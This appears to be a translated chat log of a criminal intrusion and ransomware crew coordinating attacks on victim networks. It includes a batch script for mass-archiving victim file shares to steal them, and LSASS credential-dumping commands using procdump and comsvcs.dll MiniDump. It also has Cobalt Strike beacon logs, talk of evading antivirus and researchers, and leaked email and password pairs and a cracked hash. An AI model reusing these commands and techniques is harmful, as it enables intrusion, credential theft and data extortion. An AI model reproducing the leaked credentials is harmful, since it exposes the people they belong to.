had to install timeweaver host, then there is a separate idd to enter via lockscreen set always with the enidisk you can turn on the tunnel to 3389 to your host and connect to localhost:3389People, how do I make timka or enidisk not cut off when leaving the rdpone, thank youSomething you can create, sometimes not Not all polzak have bookmarks by default, here @Code was chekker cookies, try to rewrite and other polzak will be bookmarks or possibility to createprivet, you can try to create a webrp link yourself if there is such info from available Downloads | Options | Help | LogoutHello, advise please SonicWall through the cookie, got access to the portal, but I do not see a link to webrdpok, thanks, alter asked to write to who is free timlid, I do not do anything yetATXGrimnir on the 2016 server dllka ran, everything ok https://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e 1/23 AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbiz https://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_info ok, entry points for dll ``` DllRegisterServer DllInstall DllUnregisterServer Control_RunDLL ``@all working update I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact x64 as well as x86 is much better than previous artifact 360 Total Security Essential crashesChuckWho had a normal update? 
@all update artifact whale, please test on dincek without internetnimbus2000 since there will not be a second onethere is no need to write here gentlemen #teamleaders let those who understand poorly the first time understand @all gentlemen, friends and colleagues I'm sick and tired of being a fucking babysitter for everyone there is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work the next group that will ignore it will choose a responsible person who will be punished with a ruble or permanently excluded from the work process, everyone has a nerve - I have a lot, but I also have a limit of certain I do not understand can not be inserted back or what? only by hand can be inserted? https://prnt.sc/106bra1 who is strong with tapes? I can not erase tapes, mediawalt full, but I understand they are not in the drive, and they can not erase in Burp sox can exhibitGods, anyone Burp for proxy used? All happy holiday! Happy Holidays men! ahaha Happy Holiday ALL !!!)))Not lifted the right - not a man! =) Reciprocally) Happy Holidays, men! Happy Holidays, men! :) anyone decrypted the base mssql? Shusk Who has a normal left? @all update artifact of the whale, please test it on dincek without internetnimbus2000elefantkalinka interesting thing to look at ``` https://github.com/apenwarr/sshuttle i will check it, thank you if you find it - put rukanin's ipi into the VPN adapter and you can tell the subdomains there will be something like dns.companyname.com the corporation may have its own public dns server, google anything there
```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : hub1
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet 4:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
   Physical Address. . . . . . . . . : 00-09-0F-AA-00-01
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::19f3:f0f:c790:dc10%18(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.212.134.200(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.255
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 553650447
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
   DNS Servers . . . . . . . . . . . : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Ethernet 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
   Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 PM Network Connection
   Physical Address. . . . . . . . . : 00-23-8B-CE-5F-E3
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82566DM-2 Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-23-8B-CE-5F-E2
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::3852:1640:6cf4:bd25%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 23.92.208.98(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.252
   Default Gateway . . . . . . . . . : 23.92.208.97
   DHCPv6 IAID . . . . . . . . . . . : 301998987
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
   DNS Servers . . . . . . . . . . . : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{6A8A2F53-F893-4F8E-B941-CB9F7FF92A02}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter 6TO4 Adapter:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft 6to4 Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2002:175c:d062::175c:d062(Preferred)
   Default Gateway . . . . . . . . . : 2002:c058:6301::1
                                       2002:c058:6301::c058:6301
   DHCPv6 IAID . . . . . . . . . . . : 452984832
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
   DNS Servers . . . . . . . . . . . : 8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.{6260C4BD-FC56-488A-BF39-743C46AE9648}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\Users\Administrator>route /print

Manipulates network routing tables.

ROUTE [-f] [-p] [-4|-6] command [destination]
                  [MASK netmask]  [gateway] [METRIC metric]  [IF interface]

  -f           Clears the routing tables of all gateway entries.  If this is
               used in conjunction with one of the commands, the tables are
               cleared prior to running the command.

  -p           When used with the ADD command, makes a route persistent across
               boots of the system. By default, routes are not preserved
               when the system is restarted. Ignored for all other commands,
               which always affect the appropriate persistent routes.

  -4           Force using IPv4.

  -6           Force using IPv6.

  command      One of these:
                 PRINT     Prints  a route
                 ADD       Adds    a route
                 DELETE    Deletes a route
                 CHANGE    Modifies an existing route
  destination  Specifies the host.
  MASK         Specifies that the next parameter is the 'netmask' value.
  netmask      Specifies a subnet mask value for this route entry.
               If not specified, it defaults to 255.255.255.255.
  gateway      Specifies the gateway.
  interface    the interface number for the specified route.
  METRIC       specifies the metric, ie. cost for the destination.

All symbolic names used for destination are looked up in the network database
file NETWORKS. The symbolic names for gateway are looked up in the host name
database file HOSTS.

If the command is PRINT or DELETE. Destination or gateway can be a wildcard,
(wildcard is specified as a star '*'), or the gateway argument may be omitted.

If Dest contains a * or ?, it is treated as a shell pattern, and only
matching destination routes are printed. The '*' matches any string,
and '?' matches any one char. Examples: 157.*.1, 157.*, 127.*, *224*.

Pattern match is only allowed in PRINT command.
Diagnostic Notes:
    Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
    Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1
             The route addition failed: The specified mask parameter is invalid.
             (Destination & Mask) != Destination.

Examples:

    > route PRINT
    > route PRINT -4
    > route PRINT -6
    > route PRINT 157*          .... Only prints those matching 157*

    > route ADD 157.0.0.0 MASK 255.0.0.0  157.55.80.1 METRIC 3 IF 2
             destination^      ^mask      ^gateway     metric^    ^
                                                         Interface^
      If IF is not given, it tries to find the best interface for a given
      gateway.
    > route ADD 3ffe::/32 3ffe::1

    > route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2

      CHANGE is used to modify gateway and/or metric only.

    > route DELETE 157.0.0.0
    > route DELETE 3ffe::/32

C:\Users\Administrator>route print
===========================================================================
Interface List
 18...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 17...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 13...00 23 8b ce 5f e3 ......Intel(R) PRO/1000 PM Network Connection
 12...00 23 8b ce 5f e2 ......Intel(R) 82566DM-2 Gigabit Network Connection
  1...........................Software Loopback Interface 1
 14...00 00 00 00 00 00 e0     Microsoft ISATAP Adapter
 15...00 00 00 00 00 00 e0     Microsoft 6to4 Adapter
 45...00 00 00 00 00 00 e0     Microsoft ISATAP Adapter #2
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     23.92.208.97     23.92.208.98     40
   10.212.134.200  255.255.255.255         On-link    10.212.134.200    257
     23.92.208.96  255.255.255.252         On-link      23.92.208.98    276
     23.92.208.98  255.255.255.255         On-link      23.92.208.98    276
     23.92.208.99  255.255.255.255         On-link      23.92.208.98    276
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.1.0    255.255.255.0   10.212.134.201    10.212.134.200      1
   199.192.183.66  255.255.255.255     23.92.208.97     23.92.208.98     20
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link      23.92.208.98    276
        224.0.0.0        240.0.0.0         On-link    10.212.134.200    257
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link      23.92.208.98    276
  255.255.255.255  255.255.255.255         On-link    10.212.134.200    257
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0     23.92.208.97      20
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
 15   1026 ::/0                     2002:c058:6301::1
 15   1041 ::/0                     2002:c058:6301::c058:6301
  1    306 ::1/128                  On-link
 15   1010 2002::/16                On-link
 15    266 2002:175c:d062::175c:d062/128
                                    On-link
 12    276 fe80::/64                On-link
 18    261 fe80::/64                On-link
 18    261 fe80::19f3:f0f:c790:dc10/128
                                    On-link
 12    276 fe80::3852:1640:6cf4:bd25/128
                                    On-link
  1    306 ff00::/8                 On-link
 12    276 ff00::/8                 On-link
 18    261 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

C:\Users\Administrator>
```
ipconfig /all local subnets or what? What to scan? Men, who has any ideas? on the git in the manual says it could be easier python -m pip install but easier could be python -m pip install impacket from the downloaded release folder, not the master branch It may complain next that there is no readline module pip install pyreadline and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing) it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windows impacket not install what you have a problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chach https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? 
or can anyone have a chance to quickly remove the information? at least in the logs of the backups Job done there in the logs should be visible address of the panel try to turn on the log of network connectionsGod, good day all. Perhaps someone has experienced something similar, will be able to suggest something. All servers in the network have a folder `C:\ProgramData\Veeam\Backup`, where daily log files such as `VeeamGuestHelper_13082021.log` are stored, but I can not find the veeam anywhere. i advise to set it to 5, with 9 it may take a long fucking time to compress. plus add the password to the archive as an argument, it will be fucked upYou guys, I want to share with you a useful batch file, it runs through the sphere and adds the files suitable for the date condition + creates a file with a listing of archived files and adds it to the archive, you specify your info for work:
share - path to the balloon
z7a - path to the console 7zip exe
archive - path and name of the future archive
mindate - minimum date of the file for archiving
diskword - the letter to mount the balloon fs (must be free)
compres - compression level.
*For the batch file to work, the Temp folder must be in C:\ProgramData\Temp)
**Paths to the archiver and to the archive to be created must be without spaces
***Leave all quotation marks in their place.)
save it as share.bat upload it to the server and run it through shell share.bat Minimal automation for those who drag the data =)
```
set share="\\COMPUTER.domain.com\ShareName"
set z7a=C:\ProgramData\Temp\7za.exe
set archive=C:\ProgramData\Temp\NameOfNewArchive.7za
set mindate=+01/01/2020
set diskword=L:
set compres=-mx9
net use %diskword% %share%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (\"%z7a%\" a %compres% \"%archive%\" @path)" /D %mindate%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (echo @path >> C:\ProgramData\Temp\full_listing.txt)" /D %mindate%
"%z7a%" a %compres% "%archive%" C:\ProgramData\Temp\full_listing.txt
del C:\ProgramData\Temp\full_listing.txt
net use * /delete /y
```
``try`` Lucy:Sandoval:lev.menche.dochilov@list.ru:43BNbN97t1:O586wuQt Paula:White:maks.korelov.87@bk.ru:nsR2Zdtx7x:49Jxo7A4 Jennifer:Foster:vesta.verenikina.90@mail.ru:99zjZ0F2Ow:CmynWwK2f ``To see info about majors in the company don't anyone have aka linkdin? https://github.com/RythmStick/AMSITrigger ``` If anyone needs it on pshMail Sniper is a penetration testing tool to search for certain terms (passwords, insider information, network architecture information, etc) in the Microsoft Exchange environment via e-mail. It can be used either by a non-administrative user to search their own email, or by an Exchange administrator to search each user's mailbox in the domain.https://github.com/dafthack/MailSniper https://9ba3de57-a-7faedcf5-s-sites.googlegroups.com/a/dafthack.com/dafthack/files/MailSniper-Field-Manual.pdf?attachauth=ANoY7cqDYNjE450gUhLsz7fxOdURq-1NQLB1FQibqTfEFG1SgQuMACmqcMxG42wtlOu1m3rLkQ1WfTR95mv1TilYvRskUwTtgS8qrjUWvzVjb-3PLYinJy0yI9qmLw_f2dbzktbxyOCCTQTSEwubyxtD24HLIgTmsTONnKKc6OTBMY92xZo5Uyai_bhojd5j9dNp3cznrSCNysokMUnmyOM30ulPi8pmEBBJC50vsghmgzzTvmWXQ24%3D&attredirects=0 i'm fine last night re-launched is everyone's chat is glitchy today? @steven ay thanks uncle ! 
8a62184e246b79c307a84ab75de6083b:Zgmegcgb1973201 ``Thank you broda hi@steven hello uncle. Can you help) ? ```8a62184e246b79c307a84ab75de6083b ``Does anyone have a multidomain case in the works and can shoot me a session from there? it's fucking software. with the fucked-up owners and adverts 12 year olds made by some schoolboy what safe mods stop reading all that revilian bullshit in safemode with command line support as i remember nothing can run except regular services in 10ka didn't check it is not true?i thought that in safemode aver is not started and you can kick it out by literally deleting the entire folderwhen you have access to kvm or the sphere, then yes, but as for sure not Komilfors F1 _) the server may just not come out of reboot, that's all there like in safemode user should enterthe clumsy method of bypassing avran through safemode)))) ``DTrump4ever ``what's so cool? https://xakep.ru/2021/04/08/dtrump4ever/ very cool, very! what exactly it grabs - shortcut or damag files should be tested careful with sofos, already in the second network grabs a lock like this: machine without av - #1, from it we run the locker with the flak -p \\$machine #2\c$ and on the machine #2 where there is sofos, it pals it and does not allow to prolotatomsarmhasherpiperperry can read from the running processNot .ost archive with mail weighing gigabytes, but just a config\manipulation to open the outlook on a virtual machine and the mail is fresh loaded and could read it Is the outlook has a Linux analogue of the cookie? 
To steal some config to myself and read the mail to not bother with chrome cookies \not to run into 2fa in the mailb*and in the spam filter mnu try to go to the mail see you can try to change the username, but then also the notification may comepochtimely yes I do not know clean it fits under the aforementioned, well then almost certainly will send google what alerts there are in general there are errores/notificationssmtp and who to send it to and is it tied directly to the ovner's email?there are no alerts there, they are connected to the mailbox of the ovner? maybe someone had a problem with it, so try to avoid catching an alert. I haven't worked with this kind of thing, but I've seen HPE tapes a few times, the cassettes are cleared through the drivers Googling drivers for a couple dozen cassettes who worked with this thing? Immediately after logging into a VPN and raising / session + backdoor already in the 3-4th case dropped out for good. Do you have any explanation for this? As if there on the admin sonic straight alerts and then even a bonus cut off the VPN intentionally@all write to the confines where you need to reset the session for a sonic who needs to, if someone needs a locker or a new case - similarnovshe Hi :v: maybe someone has run into this problem with java? or tell me. did first by manu ``` https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html ``` The ppa repository didn't create it. Then i tried it. 
``` sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A sudo apt-get update sudo apt-get install oracle-java15-installer sudo apt install oracle-java15-set-default ``` out like this ``` root@kali:~# sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main root@kali:~# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A Executing: /tmp/apt-key-gpghome.aOn8uUjdxO/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A gpg: key EA8CACC073C3DB2A: "Launchpad PPA for Linux Uprising" not changed gpg: Total number processed: 1 gpg: unchanged: 1 root@kali:~# sudo apt-get update Hit:1 http://deb.anydesk.com all InRelease Ign:2 http://ftp.debian.org/debian jessie-backports InRelease Hit:3 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease Get:4 http://ftp.debian.org/debian stretch-backports InRelease [91.8 kB] Hit:5 http://packages.microsoft.com/repos/vscode stable InRelease Hit:6 http://ppa.launchpad.net/linuxuprising/java/ubuntu focal InRelease Err:9 http://ftp.debian.org/debian jessie-backports Release 404 Not Found [IP: 151.101.134.132 80] Hit:7 http://ftp1.nluug.nl/os/Linux/distr/kali kali-rolling InRelease Hit:10 http://linux.teamviewer.com/deb stable InRelease Reading package lists... Done E: The repository 'http://ftp.debian.org/debian jessie-backports Release' does not have a Release file. N: Updating from such a repository can't be done securely, and is therefore disabled by default. N: See apt-secure(8) manpage for repository creation and user configuration details. root@kali:~# sudo apt-get install oracle-java15-installer Reading package lists... 
Done Building dependency tree Reading state information... Done oracle-java15-installer is already the newest version (15.0.2-1~linuxuprising0). 0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded. root@kali:~# sudo apt install oracle-java15-set-default Reading package lists... Done Building dependency tree Reading state information... Done oracle-java15-set-default is already the newest version (15.0.2-1~linuxuprising0). 0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded. root@kali:~# java -version java version "15.0.2" 2021-01-19 Java(TM) SE Runtime Environment (build 15.0.2+7-27) Java HotSpot(TM) 64-Bit Server VM (build 15.0.2+7-27, mixed mode, sharing) root@kali:~# ``` ``` root@kali:~/Cobalt42_v2# ./cobaltstrike Error opening zip file or JAR manifest missing : Hook.jar Error occurred during initialization of VM agent library failed to init: instrument ``` ``` root@kali:/opt/tomcat# sudo update-java-alternatives -l java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64 java-15-oracle 1091 /usr/lib/jvm/java-15-oracle java-1.8.0-openjdk-amd64 1081 /usr/lib/jvm/java-1.8.0-openjdk-amd64 ``` I read that the problem is in the tomcat, I did not have it installed at all. ``` root@kali:/opt/tomcat# sudo systemctl status tomcat Tomcat.service - Apache Tomcat Web Application Container Loaded: loaded (/etc/systemd/system/tomcat.service; disabled; vendor preset: disabled) Active: active (running) since Fri 2021-01-29 05:35:46 EST; 5s ago Process: 34567 ExecStart=/opt/tomcat/bin/startup.sh (code=exited, status=0/SUCCESS) Main PID: 34574 (java) Tasks: 30 (limit: 6977) Memory: 161.9M CGroup: /system.slice/tomcat.service └─34574 /usr/lib/jvm/java-15-oracle/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properti> Jan 29 05:35:46 kali systemd[1]: Starting Apache Tomcat Web Application Container... Jan 29 05:35:46 kali startup.sh[34567]: Tomcat started. 
Jan 29 05:35:46 kali systemd[1]: Started Apache Tomcat Web Application Container. lines 1-13/13 (END) ``` ``` ./cobaltstrike Error opening zip file or JAR manifest missing : Hook.jar Error occurred during initialization of VM Agent library failed to init: instrument ``` they come on the tail of the link after the domain that adds the profileTurn off the profile xxxx.profile (aka trevor.profile)In general, the analyst sessions come from the profile of our https://pastebin.com/yB6RJ63F which pavel borisov and so on that for sessions kgbshnik http://www.domenburg.com/en/ give the registrar of domains without docks for bitok except naimchipan ip servak that do not lomyaet through the domain reserchatopfy dohren sessions kgbshnikov poured, but in weblog them not, is it normal at all? and I have the same, I thought someone from ours tests) look at the date of appearance of sessions it is not staging it just scan
```
01/28 09:55:11 visit (port 443) from: 179.43.176.133 Request: GET /admin/index.php Response: 404 Not Found Mozilla/5.0
```
I've got all the same ones like this
```
01/28 06:07:07 visit (port 8443) from: 168.119.77.163 Request: GET /Gvh7/ beacon beacon stager x86 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:07 visit (port 8443) from: 168.119.77.163 Request: GET /hIt8/. beacon beacon stager x64 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:23 visit (port 443) from: 168.119.77.163 Request: GET /qNm0/. beacon beacon stager x86 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:23 visit (port 443) from: 168.119.77.163 Request: GET /bApJ/. beacon beacon stager x64 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:42 visit (port 443) from: 204.16.247.101 Request: GET /lHu3/. beacon beacon stager x86 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
01/28 06:07:42 visit (port 443) from: 204.16.247.101 Request: GET /PTRg/. beacon beacon stager x64 Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
```
I won't be here today, I'll look into it tomorrow. Don't worry, it's because the stepping was done via host, i.e. before if you scan domains no stepping was done, on 4.1 also had xxxxx profile, but it didn't come out this way, so it's probably not the profile either, i updated the listener completely via domain+4.2 and flew we have the same one, when the whole thing came through the domain) i switched the listener to the correct one i got this problem when in fact i have a different one but the situation is the same!profilenow I'll find out what small profile more likely whitelist is needed. 
they are random virtuals\processes slutserversion timserversion alonetoday it looks like in 199 there is no such a dependence in the 104 band checked + 1 give minutes, the russian come and go with the ssr also 1v1 pictureWhen we were given version 3.0 back in the year, there were already analysts flying in
```
01/28 03:46:14 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:16:16 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:46:17 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:58:13 *** initial beacon from Administrator *@172.16.1.113 (WIN-3AI1DIQI7NN)
01/28 05:16:19 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 07:46:40 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:16:42 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:46:44 *** initial beacon from sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:16:46 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:46:48 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
```
This is just for today, Moscow time. Change the channel to RenTV. conspiracy, theory, masons - what awaits us with the new update cobalt :) if there will be no false sessions - it means it's in the cob 4.2 and there are no options there 4.2 version without hookup sit back to wait for a hoster to get a cob 4.1mechanics how to check it just so and why? have you seen the logins of other users on your timeserver? when you connect to a timeserver as a client, authentication data could leak out to the left or some dumb hdv and why does it do that? when you start the listener, it sends information about them somewhere. what is the secret tab? there could leak data from timeservers you connect to, like blackheats and software - back up!ovner maybe pawned himself =) i asked about the bookmark) like yes it was on the cobalt 4.2 began to happen, no? 
and by the way the searchers usually come upon a grid mess, find the paiload, begin to investigate i've never seen a session fly right after the listener went up and it's a pain in the ass to take registrars' accounts and transfer level 3 domains to my own backend it's possible to "hide" that's how to do it in different places where you can't pay with bitcoins only it would be good to have a script for whitelisting sessions and unpacks. like, if a session came in - let it go ``` in #cobalt_cna_scripts there is blacklist through nymchip took as well as our hosterv kobe)periodicallyweb logs of webservers you already see, before the hoster I myself bought servers in different places, domains and setapil everything, the same analytics would fly over and look logs of webservers, who has ssx on the server have gaps or not?and they were like, ok, so the domain is not for malware and they will go on and on you have a session whitelisting in blacklists, probably immediately after the registration of the domain to do it on the fly, but the troublesome arranging a wild script would be nice to pump some whitelisting sessions / ipaks. like came the session - to let her not to let him sam kobalt by the way have not checked for bookmarks? you can look at the web servers, if they are available if a pile of requests comes right after you release apache/enginx, the reserchers probably know everything beforehand, someone in AV company figured out how to automate it and that's it. 
the server and 2 procl at another registrar for the sake of experiment and look - if it will not bang with the same profile, it means that the registrar leaks and yes, the server just set up, setup the listener and the session went a sample shellcode they have, I have a conspiracy theory and still do not care, but my profile is not the same as Vastoni, Technologist, Red - do you also take it there?I order from our hoster is unlikely it has any effect on anything) dishonest? i myself am curious but have not got time to dig around) most likely it's about the profile, yes the server response type in the scan to the client ask viola he will explain in more detail) something fishy it's all, I thought it only nastiak you have a session rises one thing is just a web redirect comes in the coba, another thing is when they bring up a session to you on the domain that did not show up anywheretypes scan and poke then statues collect botnu alt said that all newly reg domains reserchatnu is clearly one and the same group reserchers, how do they knit newly reg domains and comes knockout to paiload that was not used?we also have two servers attacking clean, domains because they are new in the padding, so analysts are attacking them to collect status on cobaltprofile k2 use ?@alter how can this be ?all sorts of kgb makarovs are knocking around and the server is also plus or minus new and nowhere to show upxxm, we have the same fuck with cobalt, for at least a week now and again i have beacon released the dll; and here new ssh session, and what does it mean and from where is not clear never happened before to garbage after checking rantime all i did was check the dll on dyncheck for windef and sophos rant, and that's it)and the server and the pad are new; i just bought and started the timserver
```
01/28 05:07:58 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
01/28 05:37:59 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
```
I keep getting some garbage spawned and immediately die; everywhere new ssh session and russian surnames
```
01/27 21:11:55 *** new ssh session makarov *@70.9.50.56 (EDOR-1B5C7CDB30)
01/27 23:44:39 *** new ssh session sobol *@68.69.70.9 (OR-18714C2795)
```
mozhetku tell me, run timeserver, server itself is new, linux also; the file has not loaded anywhere po rocket fell? @rozetka thanks will try Although it may work for the context polzak, then impacetto if psekez.ru with hash and there interakt shell be long time ago i used to use the read function copy the code of the hashpowershell psexec \host -s cmd thank you, it worked!@rozetka tell me how to psexec pozhtaa, this is really useful, if there is no gui.... also through psexec was started and dumped, if the database is opennu there already who likes what http://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeeThief.ps1 powershell ISE can still export the CSV with the CSV codeNow it's open, you kinda passed the authorization)) so easy)) try it in the keepass itself ?File-export and there where you want to golf Access to gui ? @all help @green urgent question nid help! tell me how to dump open keepass having access to tachkeda and allbatnik strtani through gpon viam 445 open , access denied all accounts or everything is also nada? on viam, anything open? not through default psekez vmik staszkili to it? Who knows about GPOs? Got the rights yes There are two machines on the network - the Veeam server and the IT guy's machine The task to get to them The IT guy is completely closed (hostname by name detected, pinging, but ports are closed) What options are there to get shell on the machines listed above? In fact, the whole case is stuck in this place.and the native task manager is not removed or what? @red will share with the lambchop? I think we will need ... 
@all call back who in the near future will need to distribute/execute the file there is an upgrade-automator that requires testing by the userr then kz how to dump it so i dont even have a local admin *rukalytso * yeah and throw plz output whoami /rriv either because yuak blocks or kzto that cilance does not palit it exactly, but we through shel did not go, because privilege debugtam not work recompiled libs to work with winapi to unhook the engine cilansadumper2020 approuvedCMD software from the folder where the ehe lies openprocdump64.exe -ma lsass.exe lsass.dmpprocdump will cut the lsass even wonder if it will work or notsam compiled yesterday all night fucked try to run from ndp from admintaskmanager even not from adminnu we ended up not removed, but if you ndp there is a chancerundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\programdata\intel.log full mimoshes funny1111 we've been fucking around for 3 or 4 days lol enjoy it) rdp local admin :) ahahaha no session how do i unload the lsass from the pc where the cilance is ?Pass in config is encrypted in b64 kind of way, so config is better to generate it separately somewhere through rclone config, then just copy it. how can you specify pass from config file? *Mega is a cloud storage and file hosting service known for its security feature where all files are encrypted locally before they are uploaded. 
